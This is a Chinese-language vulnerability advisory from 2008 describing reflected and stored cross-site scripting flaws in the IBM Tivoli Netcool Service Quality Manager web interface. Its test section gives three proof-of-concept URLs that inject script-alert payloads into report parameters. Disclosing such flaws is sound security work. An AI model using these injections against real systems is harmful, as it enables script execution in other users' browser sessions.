发布日期：2008-11-10
更新日期：2008-11-11

受影响系统：

IBM Tivoli Netcool Service Quality Manager

描述：

---

BUGTRAQ  ID: 32233

IBM Tivoli Netcool Service Quality Manager是IBM Tivoli服务质量管理解决方案的核心软件。

Tivoli Netcool Service Quality Manager的Web接口中存在多个跨站脚本漏洞，已认证的用户可以使用报表生成功能创建名称中嵌入了恶意代码的报表，当在主面板中打开报表历史时就会在用户浏览器会话中执行注入的代码。

至少有以下三个页面存在漏洞：

      * http://server/<document root>/ReportTree
      * http://server/<document root>/Launch
      * http://server/<document root>/ReportRequest

<*来源：Francesco Bianchino （f.bianchino@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=122624648406239&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://server/<document
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Nonpersistant XSS");</SCRIPT><!--&date=0000000000000
http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("NonPersistant XSS");</SCRIPT>
http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main

建议：

---

厂商补丁：

IBM
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ers.ibm.com/

浏览次数：2613
严重程度：0（网友投票）